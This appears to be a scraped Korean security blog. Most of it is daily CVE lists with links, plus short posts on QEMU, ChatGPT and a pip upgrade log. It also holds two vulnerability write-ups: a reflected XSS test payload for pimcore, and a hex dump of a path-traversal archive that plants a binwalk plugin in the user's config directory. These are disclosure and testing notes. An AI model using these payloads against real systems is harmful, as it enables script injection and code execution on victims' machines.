반응형
datetime subject id link
2023-03-13 08:00:07.614784 (HashiCorp Vault) CVE-2023-24999 https://cve.report/CVE-2023-24999
2023-03-13 14:00:05.519906 (GitHub, SQL injection) CVE-2023-1361 https://cve.report/CVE-2023-1361
2023-03-13 14:00:05.520244 (GitHub) CVE-2023-1362 https://cve.report/CVE-2023-1362
2023-03-13 18:00:06.123354 (GitHub, Code Injection) CVE-2023-1367 https://cve.report/CVE-2023-1367
2023-03-13 18:00:06.123787 (PHP, SQL injection, Critical) CVE-2023-1365 https://cve.report/CVE-2023-1365
2023-03-13 18:00:06.124162 (PHP, SQL injection, Critical) CVE-2023-1364 https://cve.report/CVE-2023-1364
2023-03-13 19:00:03.812133 (PHP, SQL injection, Critical) CVE-2023-1368 https://cve.report/CVE-2023-1368
2023-03-13 19:00:03.812506 (PHP, SQL injection, Critical) CVE-2023-1366 https://cve.report/CVE-2023-1366
2023-03-13 22:00:04.108741 (Docker) CVE-2023-0629 https://cve.report/CVE-2023-0629
2023-03-13 22:00:04.109121 (Docker, Arbitrary Command) CVE-2023-0628 https://cve.report/CVE-2023-0628
2023-03-13 23:00:03.618408 (WordPress) CVE-2023-1374 https://cve.report/CVE-2023-1374
2023-03-13 23:00:03.618829 (WordPress) CVE-2023-1372 https://cve.report/CVE-2023-1372
반응형
반응형
datetime subject id link
2023-03-11 01:00:05.213381 (GitHub, XSS) CVE-2023-1315 https://cve.report/CVE-2023-1315
2023-03-11 01:00:05.213668 (XSS) CVE-2022-48111 https://cve.report/CVE-2022-48111
2023-03-11 02:00:04.116962 (File Upload) CVE-2023-27164 https://cve.report/CVE-2023-27164
2023-03-11 02:00:04.117348 (PHP, SQL injection, Critical) CVE-2023-1322 https://cve.report/CVE-2023-1322
2023-03-11 02:00:04.117639 (PHP, SQL injection, Critical) CVE-2023-1321 https://cve.report/CVE-2023-1321
2023-03-11 02:00:04.117972 (GitHub, XSS) CVE-2023-1320 https://cve.report/CVE-2023-1320
2023-03-11 02:00:04.118223 (GitHub, XSS) CVE-2023-1319 https://cve.report/CVE-2023-1319
2023-03-11 02:00:04.118457 (GitHub, XSS) CVE-2023-1318 https://cve.report/CVE-2023-1318
2023-03-11 02:00:04.118736 (GitHub, XSS) CVE-2023-1317 https://cve.report/CVE-2023-1317
2023-03-11 02:00:04.119016 (GitHub, XSS) CVE-2023-1316 https://cve.report/CVE-2023-1316
2023-03-11 06:00:04.201341 (WordPress) CVE-2023-1346 https://cve.report/CVE-2023-1346
2023-03-11 06:00:04.201828 (WordPress) CVE-2023-1345 https://cve.report/CVE-2023-1345
2023-03-11 06:00:04.202139 (WordPress) CVE-2023-1344 https://cve.report/CVE-2023-1344
2023-03-11 06:00:04.202463 (WordPress) CVE-2023-1343 https://cve.report/CVE-2023-1343
2023-03-11 06:00:04.213882 (WordPress) CVE-2023-1342 https://cve.report/CVE-2023-1342
2023-03-11 06:00:04.214260 (WordPress) CVE-2023-1341 https://cve.report/CVE-2023-1341
2023-03-11 06:00:04.214561 (WordPress) CVE-2023-1340 https://cve.report/CVE-2023-1340
2023-03-11 06:00:04.214903 (WordPress) CVE-2023-1339 https://cve.report/CVE-2023-1339
2023-03-11 06:00:04.215193 (WordPress) CVE-2023-1338 https://cve.report/CVE-2023-1338
2023-03-11 06:00:04.215469 (WordPress) CVE-2023-1337 https://cve.report/CVE-2023-1337
2023-03-11 06:00:04.215806 (WordPress) CVE-2023-1336 https://cve.report/CVE-2023-1336
2023-03-11 06:00:04.216097 (WordPress) CVE-2023-1335 https://cve.report/CVE-2023-1335
2023-03-11 06:00:04.216366 (WordPress) CVE-2023-1334 https://cve.report/CVE-2023-1334
2023-03-11 06:00:04.216636 (WordPress) CVE-2023-1333 https://cve.report/CVE-2023-1333
2023-03-11 07:00:05.203509 (Jenkins, XSS) CVE-2023-27905 https://cve.report/CVE-2023-27905
2023-03-11 07:00:05.203883 (Jenkins) CVE-2023-27904 https://cve.report/CVE-2023-27904
2023-03-11 07:00:05.204199 (Jenkins) CVE-2023-27903 https://cve.report/CVE-2023-27903
2023-03-11 07:00:05.204479 (Jenkins) CVE-2023-27902 https://cve.report/CVE-2023-27902
2023-03-11 07:00:05.204829 (Jenkins, Apache Commons FileUpload) CVE-2023-27901 https://cve.report/CVE-2023-27901
2023-03-11 07:00:05.205202 (Jenkins, Apache Commons FileUpload) CVE-2023-27900 https://cve.report/CVE-2023-27900
2023-03-11 07:00:05.205504 (Jenkins) CVE-2023-27899 https://cve.report/CVE-2023-27899
2023-03-11 07:00:05.205889 (Jenkins, XSS) CVE-2023-27898 https://cve.report/CVE-2023-27898
2023-03-11 07:00:05.206898 (Remote Code Execution) CVE-2023-25143 https://cve.report/CVE-2023-25143
2023-03-11 07:00:05.207465 (SQL injection) CVE-2023-1198 https://cve.report/CVE-2023-1198
2023-03-11 08:00:06.123215 (PHP, File Upload) CVE-2023-23328 https://cve.report/CVE-2023-23328
2023-03-11 08:00:06.123768 (XSS) CVE-2023-23326 https://cve.report/CVE-2023-23326
2023-03-11 19:00:04.505535 (Command Injection, Critical) CVE-2023-1350 https://cve.report/CVE-2023-1350
2023-03-11 19:00:04.505941 (PHP) CVE-2023-1349 https://cve.report/CVE-2023-1349
2023-03-11 22:00:04.323025 (PHP, SQL injection, Critical) CVE-2023-1351 https://cve.report/CVE-2023-1351
반응형
반응형

ref

배경

  • github 내의 Reflected 환경에서의 Cross-site Scripting 취약점 발견
  • 해당 취약점은 pimcore v10.5.19 이하 버전에서 발견

분석

  • pimcore는 Application Logger 모듈 검색할 때 From 및 To 필드에서 Reflected XSS에 취약
  • 테스트
"><img src=x onerror=alert(document.domain);>

패치 방법

  • 업데이트
    • v10.5.19 보다 높은 버전으로 업데이트 진행 필요
반응형
반응형
datetime subject id link
2023-03-10 01:00:03.115675 (PHP, SQL injection, Critical) CVE-2023-1294 https://cve.report/CVE-2023-1294
2023-03-10 01:00:03.116089 (MySQL, PHP, SQL injection, Critical) CVE-2023-1293 https://cve.report/CVE-2023-1293
2023-03-10 01:00:03.116470 (PHP, SQL injection, Critical) CVE-2023-1292 https://cve.report/CVE-2023-1292
2023-03-10 01:00:03.116760 (PHP, SQL injection, Critical) CVE-2023-1291 https://cve.report/CVE-2023-1291
2023-03-10 01:00:03.117123 (PHP, SQL injection, Critical) CVE-2023-1290 https://cve.report/CVE-2023-1290
2023-03-10 03:00:04.418983 (XXE) CVE-2023-1288 https://cve.report/CVE-2023-1288
2023-03-10 03:00:04.419198 (Remote Code Execution) CVE-2023-1287 https://cve.report/CVE-2023-1287
2023-03-10 07:00:06.313313 (Remote Attack) CVE-2023-20049 https://cve.report/CVE-2023-20049
2023-03-10 07:00:06.314251 (Kubernetes) CVE-2023-27484 https://cve.report/CVE-2023-27484
2023-03-10 07:00:06.314645 (Kubernetes) CVE-2023-27483 https://cve.report/CVE-2023-27483
2023-03-10 07:00:06.314962 (PHP, SQL injection) CVE-2023-27214 https://cve.report/CVE-2023-27214
2023-03-10 07:00:06.315320 (PHP, SQL injection) CVE-2023-27213 https://cve.report/CVE-2023-27213
2023-03-10 07:00:06.315536 (PHP, XSS) CVE-2023-27212 https://cve.report/CVE-2023-27212
2023-03-10 07:00:06.315780 (PHP, XSS) CVE-2023-27211 https://cve.report/CVE-2023-27211
2023-03-10 07:00:06.316071 (PHP, SQL injection) CVE-2023-27210 https://cve.report/CVE-2023-27210
2023-03-10 07:00:06.316441 (PHP, XSS) CVE-2023-27208 https://cve.report/CVE-2023-27208
2023-03-10 07:00:06.316635 (PHP, SQL injection) CVE-2023-27207 https://cve.report/CVE-2023-27207
2023-03-10 07:00:06.316963 (PHP, XSS) CVE-2023-27206 https://cve.report/CVE-2023-27206
2023-03-10 07:00:06.317316 (PHP, SQL injection) CVE-2023-27205 https://cve.report/CVE-2023-27205
2023-03-10 07:00:06.317523 (PHP, SQL injection) CVE-2023-27204 https://cve.report/CVE-2023-27204
2023-03-10 07:00:06.317780 (PHP, SQL injection) CVE-2023-27203 https://cve.report/CVE-2023-27203
2023-03-10 07:00:06.318058 (PHP, SQL injection) CVE-2023-27202 https://cve.report/CVE-2023-27202
2023-03-10 08:00:07.510890 (PHP, Critical) CVE-2023-1303 https://cve.report/CVE-2023-1303
2023-03-10 08:00:07.511289 (PHP) CVE-2023-1302 https://cve.report/CVE-2023-1302
2023-03-10 08:00:07.511584 (PHP, SQL injection, Critical) CVE-2023-1301 https://cve.report/CVE-2023-1301
2023-03-10 08:00:07.511907 (PHP, SQL injection, Critical) CVE-2023-1300 https://cve.report/CVE-2023-1300
2023-03-10 08:00:07.512556 (XSS) CVE-2023-0050 https://cve.report/CVE-2023-0050
2023-03-10 11:00:04.618899 (GitHub) CVE-2023-1307 https://cve.report/CVE-2023-1307
2023-03-10 18:00:04.720245 (PHP, SQL injection, Critical) CVE-2023-1311 https://cve.report/CVE-2023-1311
2023-03-10 18:00:04.720543 (PHP, SQL injection, Critical) CVE-2023-1310 https://cve.report/CVE-2023-1310
2023-03-10 18:00:04.720857 (PHP, SQL injection, Critical) CVE-2023-1309 https://cve.report/CVE-2023-1309
2023-03-10 18:00:04.721165 (PHP, SQL injection, Critical) CVE-2023-1308 https://cve.report/CVE-2023-1308
2023-03-10 18:00:04.721421 (SQL injection) CVE-2023-1091 https://cve.report/CVE-2023-1091
2023-03-10 20:00:08.209186 (GitHub, XSS) CVE-2023-1312 https://cve.report/CVE-2023-1312
2023-03-10 21:00:04.723760 (GitHub) CVE-2023-1313 https://cve.report/CVE-2023-1313
2023-03-10 21:00:04.724142 (Remote Attack) CVE-2023-22301 https://cve.report/CVE-2023-22301
2023-03-10 23:00:04.506170 (PHP, SQL injection) CVE-2023-24774 https://cve.report/CVE-2023-24774
반응형
반응형
datetime subject id link
2023-03-09 18:11:47.825166 (SQL injection) CVE-2023-1251 https://cve.report/CVE-2023-1251
2023-03-09 18:11:47.825320 (Code Injection) CVE-2023-27986 https://cve.report/CVE-2023-27986
2023-03-09 18:11:47.825463 (Command Injection) CVE-2023-27985 https://cve.report/CVE-2023-27985
2023-03-09 18:11:47.826240 (SQL injection) CVE-2023-24777 https://cve.report/CVE-2023-24777
2023-03-09 18:11:47.826355 (GitHub, Code Injection) CVE-2023-1283 https://cve.report/CVE-2023-1283
2023-03-09 18:11:47.826639 (SQL injection) CVE-2023-24782 https://cve.report/CVE-2023-24782
2023-03-09 18:11:47.826818 (File Upload) CVE-2023-24282 https://cve.report/CVE-2023-24282
2023-03-09 18:11:47.827172 (Remote Code Execution) CVE-2023-22889 https://cve.report/CVE-2023-22889
2023-03-09 18:11:47.828366 (Remote Code Execution, GitHub, GitHub Enterprise Server) CVE-2023-23760 https://cve.report/CVE-2023-23760
2023-03-09 18:11:47.828524 (PHP) CVE-2023-1278 https://cve.report/CVE-2023-1278
2023-03-09 18:11:47.828682 (Command Injection, Critical) CVE-2023-1277 https://cve.report/CVE-2023-1277
2023-03-09 18:11:47.828947 (PHP, SQL injection, Critical) CVE-2023-1276 https://cve.report/CVE-2023-1276
2023-03-09 18:11:47.829201 (PHP) CVE-2023-1275 https://cve.report/CVE-2023-1275
2023-03-09 18:11:47.829459 (Docker) CVE-2023-27482 https://cve.report/CVE-2023-27482
2023-03-09 18:11:47.829773 (Remote Attack, SQL injection) CVE-2023-26922 https://cve.report/CVE-2023-26922
2023-03-09 18:11:47.829939 (SQL injection) CVE-2023-24773 https://cve.report/CVE-2023-24773
2023-03-09 18:11:47.830133 (XSS) CVE-2023-26952 https://cve.report/CVE-2023-26952
2023-03-09 18:11:47.830244 (Command Injection) CVE-2023-25395 https://cve.report/CVE-2023-25395
2023-03-09 18:11:47.830353 (Command Injection, GitHub) CVE-2023-1270 https://cve.report/CVE-2023-1270
2023-03-09 18:11:47.830477 (XSS) CVE-2023-26950 https://cve.report/CVE-2023-26950
2023-03-09 18:11:47.830601 (SQL injection) CVE-2023-1267 https://cve.report/CVE-2023-1267
2023-03-09 18:11:47.830889 (GitHub) CVE-2023-1269 https://cve.report/CVE-2023-1269
2023-03-09 18:11:47.831023 (PHP, XSS) CVE-2023-24657 https://cve.report/CVE-2023-24657
2023-03-09 18:11:47.831410 (SQL injection) CVE-2023-24780 https://cve.report/CVE-2023-24780
2023-03-09 18:11:47.832442 (GitHub) CVE-2023-1264 https://cve.report/CVE-2023-1264
2023-03-09 18:11:47.832621 (PHP, File Upload) CVE-2023-26823 https://cve.report/CVE-2023-26823
2023-03-09 18:11:47.832849 (WordPress) CVE-2023-1263 https://cve.report/CVE-2023-1263
2023-03-09 18:11:47.833001 (Remote Attack) CVE-2023-1236 https://cve.report/CVE-2023-1236
2023-03-09 18:11:47.833137 (Remote Attack) CVE-2023-1235 https://cve.report/CVE-2023-1235
2023-03-09 18:11:47.833266 (Remote Attack) CVE-2023-1234 https://cve.report/CVE-2023-1234
2023-03-09 18:11:47.833475 (Remote Attack) CVE-2023-1232 https://cve.report/CVE-2023-1232
2023-03-09 18:11:47.833608 (Remote Attack) CVE-2023-1231 https://cve.report/CVE-2023-1231
2023-03-09 18:11:47.833901 (Remote Attack) CVE-2023-1229 https://cve.report/CVE-2023-1229
2023-03-09 18:11:47.834040 (Remote Attack) CVE-2023-1228 https://cve.report/CVE-2023-1228
2023-03-09 18:11:47.834181 (Remote Attack) CVE-2023-1227 https://cve.report/CVE-2023-1227
2023-03-09 18:11:47.834308 (Remote Attack) CVE-2023-1226 https://cve.report/CVE-2023-1226
2023-03-09 18:11:47.834436 (Remote Attack) CVE-2023-1225 https://cve.report/CVE-2023-1225
2023-03-09 18:11:47.834564 (Remote Attack) CVE-2023-1224 https://cve.report/CVE-2023-1224
2023-03-09 18:11:47.834734 (Remote Attack) CVE-2023-1223 https://cve.report/CVE-2023-1223
2023-03-09 18:11:47.834909 (Remote Attack) CVE-2023-1222 https://cve.report/CVE-2023-1222
2023-03-09 18:11:47.835125 (Remote Attack) CVE-2023-1220 https://cve.report/CVE-2023-1220
2023-03-09 18:11:47.835258 (Remote Attack) CVE-2023-1219 https://cve.report/CVE-2023-1219
2023-03-09 18:11:47.835384 (Remote Attack) CVE-2023-1218 https://cve.report/CVE-2023-1218
2023-03-09 20:00:06.312000 (GitHub, XSS) CVE-2023-1286 https://cve.report/CVE-2023-1286
반응형
반응형

안녕하세요. crattack입니다.

제가 가볍게 취약점 분석을 하려고 준비하고 있는 것 중에 하나를 공유하려고 합니다.

 

1. 목적

많은 CVE가 나오고 있습니다. 그 중에 어떤 것들을 봐야할지 어떤 것들이 중요한지를 분류하기란 쉽지 않습니다.

따라서, 저는 앞으로 T(Today)-1 기준으로 다음의 분류 항목에 맞게 CVE와 CVE URL을 제공하려고 합니다.

관심 있는 분들은 이 곳에서 참고하시어 연구하시는데 도움이 되셨으면 합니다.

 

https://www.cve.org/About/Process

2. 공유 양식

[Date] [분류 (Remote Attack, SQL Injection, XSS, Command Injection, Github, Docker, 등등)] [CVE No.] [CVE URL]

추가적인 정보를 원하시면 의견을 주세요.

 

3. 마치며

앞으로 더 좋은 것들을 공유 하도록 노력 하겠습니다.

감사합니다.

반응형
반응형

QEMU란?

QEMU는 가상화 소프트웨어이며, 사용자가 다양한 아키텍처에서 가상머신을 실행할 수 있도록 지원합니다. 이 소프트웨어는 무료이며, 다양한 운영체제에서 동작합니다. QEMU는 또한 하드웨어 가속 기술을 지원하며, 특히 KVM(Kernel Virtual Machine)과 결합하여 가상화를 향상시킬 수 있습니다.

QEMU의 기능

QEMU는 다음과 같은 기능을 제공합니다.

  • 가상머신 생성 및 실행
  • 다양한 아키텍처에서의 가상머신 지원
  • 하드웨어 가속 기술 지원
  • 다양한 운영체제에서 동작
  • GUI 및 CLI 인터페이스 제공

QEMU의 사용

QEMU는 가상머신을 생성하고 실행하는 데 사용됩니다. QEMU를 사용하여 가상머신을 생성하고 실행하려면, 다음과 같은 단계를 따르면 됩니다.

  1. QEMU를 설치합니다.
  2. QEMU를 사용하여 가상머신을 생성합니다.
  3. 생성한 가상머신에서 운영체제를 설치합니다.
  4. 생성한 가상머신을 실행합니다.

QEMU는 CLI(Command-Line Interface)를 통해 사용할 수 있으며, 다음과 같은 명령어를 사용하여 가상머신을 생성하고 실행할 수 있습니다.

qemu-system-{arch} [options] [disk_image]

여기서 {arch}는 생성하려는 가상머신의 아키텍처를 나타냅니다. 예를 들어, x86 아키텍처의 가상머신을 생성하려면 qemu-system-x86_64 명령어를 사용합니다.

QEMU의 장단점

장점

  • 다양한 아키텍처에서의 가상머신 지원
  • 하드웨어 가속 기술 지원
  • 다양한 운영체제에서 동작

단점

  • 성능이 상대적으로 느림
  • GUI 인터페이스가 다소 불편함

결론

QEMU는 무료이며, 다양한 아키텍처에서 가상머신을 실행할 수 있는 가상화 소프트웨어입니다. 하드웨어 가속 기술을 지원하여 가상화를 향상시킬 수 있으며, 다양한 운영체제에서 동작합니다. 그러나 성능이 상대적으로 느리고 GUI 인터페이스가 다소 불편하다는 단점이 있습니다.

반응형
반응형
chatGPT 사용 예시

 

2022년 보안 이슈 질의

사용해 본 결과

- 동향 및 간략한 정리용 보고서를 사용하는데 아주 좋다.

- 아직은 심도 있는 코드쪽은 사용해보지 못했지만, 여러 정황으로 볼때 퀄리티는 나쁘지 않을 것으로 예상된다.

- 취약점 점검도 가능한지는 도전해보고 싶다는 의욕이 생겼다.

- 다음에는 동영상 편집쪽으로 테스트 해볼 계획이다.

- 앞으로 먹고 살기 힘들구만...ㅜㅜ

반응형

'Reverse > 분석중' 카테고리의 다른 글

[Ref] Spectrum Analyser  (0) 2023.01.13
반응형
babyhack@ubuntu:~/tmp$ sudo pip3 install pip --upgrade
Traceback (most recent call last):
  File "/usr/bin/pip3", line 11, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.5/dist-packages/pip/__init__.py", line 11, in main
    from pip._internal.utils.entrypoints import _wrapper
  File "/usr/local/lib/python3.5/dist-packages/pip/_internal/utils/entrypoints.py", line 12
    f"pip{sys.version_info.major}",
                                 ^
SyntaxError: invalid syntax
babyhack@ubuntu:~/tmp$ wget https://bootstrap.pypa.io/pip/3.5/get-pip.py
--2023-02-10 00:21:55--  https://bootstrap.pypa.io/pip/3.5/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)... 151.101.0.175, 151.101.64.175, 151.101.128.175, ...
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443... connected.
HTTP request sent, awaiting response...
200 OK
Length: 1908223 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’

get-pip.py                           100%[===================================================================>]   1.82M  6.01MB/s    in 0.3s

2023-02-10 00:21:55 (6.01 MB/s) - ‘get-pip.py’ saved [1908223/1908223]

babyhack@ubuntu:~/tmp$ python3 get-pip.py
DEPRECATION: Python 3.5 reached the end of its life on September 13th, 2020. Please upgrade your Python as Python 3.5 is no longer maintained. pip 21.0 will drop support for Python 3.5 in January 2021. pip 21.0 will remove support for this functionality.
Defaulting to user installation because normal site-packages is not writeable
Collecting pip<21.0
  Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 7.7 MB/s
Installing collected packages: pip
Successfully installed pip-20.3.4
babyhack@ubuntu:~/tmp$ sudo pip3 install pip --upgrade
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 3.5 reached the end of its life on September 13th, 2020. Please upgrade your Python as Python 3.5 is no longer maintained. pip 21.0 will drop support for Python 3.5 in January 2021. pip 21.0 will remove support for this functionality.
WARNING: The directory '/home/babyhack/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Requirement already satisfied: pip in /home/babyhack/.local/lib/python3.5/site-packages (20.3.4)
Collecting pip
  Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 5.8 MB/s
  Downloading pip-20.3.3-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 9.4 MB/s
babyhack@ubuntu:~/tmp$

 

명령어

반응형

'프로그래밍 > Python' 카테고리의 다른 글

[codegate2016] compress 복호화  (0) 2016.03.16
File Fuzzer v.0.1  (2) 2013.08.11
danger_track를 이용한 crash dump 활용  (0) 2013.07.30
win7 에서 pydbg 이용한 snap 찍기  (0) 2013.07.29
Windows 7에서 pydbg 설치 하기  (0) 2013.07.26
반응형

설명

버전 2.1.2b ~ 2.3.2 까지의 ReFirm Labs binwalk에서 경로 탐색 취약점이 확인 되었다.

이 취약점을 통해 원격 공격자는 영향을 받는 binwalk 설치에서 임의 코드를 실행 할 수 있다.

“-e : 대상이 추출 모드(옵션)를 사용하여, binwalk로 악성 파일을 열어야 한다.”는 점에서 이 취약점을 악용하려면 사용자 상호 작용이 필요합니다 .

테스트 환경

  • MacOS Ventura 3.1
  • Homebrew로 설치한 Binwalk v2.3.3

테스트 과정

  1. binwalk -e -M poc.zip
babyhack@MacBookPro> binwalk -e -M poc.zip

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/poc.zip
MD5 Checksum:  4fdad30c7c1b4915938b5ad2786f5bf8
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 170, uncompressed size: 349, name: malicious.pfs
324           0x144           End of Zip archive, footer length: 22

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/_poc.zip.extracted/malicious.pfs
MD5 Checksum:  9a12bccad3db3ed8b818a31846d5976f
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PFS filesystem, version 0.9, 1 files

malicious.pfs 파일 내용

babyhack@MacBookPro> xxd malicious.pfs
00000000: 5046 532f 302e 3900 0000 0000 0000 0100  PFS/0.9.........
00000010: 2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967  ../../../.config
00000020: 2f62 696e 7761 6c6b 2f70 6c75 6769 6e73  /binwalk/plugins
00000030: 2f6d 616c 7761 6c6b 2e70 7900 0000 0000  /malwalk.py.....
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 3412 0000 a000 0000 c100 0000 696d 706f  4...........impo
000000a0: 7274 2062 696e 7761 6c6b 2e63 6f72 652e  rt binwalk.core.
000000b0: 706c 7567 696e 0a0a 636c 6173 7320 4d61  plugin..class Ma
000000c0: 6c69 6369 6f75 7345 7874 7261 6374 6f72  liciousExtractor
000000d0: 2862 696e 7761 6c6b 2e63 6f72 652e 706c  (binwalk.core.pl
000000e0: 7567 696e 2e50 6c75 6769 6e29 3a0a 2020  ugin.Plugin):.
000000f0: 2020 2222 220a 2020 2020 4d61 6c69 6369    """.    Malici
00000100: 6f75 7320 6269 6e77 616c 6b20 706c 7567  ous binwalk plug
00000110: 696e 0a20 2020 2022 2222 0a0a 2020 2020  in.    """..
00000120: 6465 6620 696e 6974 2873 656c 6629 3a0a  def init(self):.
00000130: 2020 2020 2020 2020 7072 696e 7428 2268          print("h
00000140: 656c 6c6f 2066 726f 6d20 6d61 6c69 6369  ello from malici
00000150: 6f75 7320 706c 7567 696e 2229 0a         ous plugin").
import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
"""    Malicious binwalk plugin.    """
	def init(self):
		print("hello from malicious plugin")

결과

  • binwalk.core.plugin 파일을 참조할 수 없어 제대로 실행 되지 않음.
  • 버전이 맞지 않아서 제대로 실행되지 않을 가능성도 있음.

ref.

  • https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk
반응형

+ Recent posts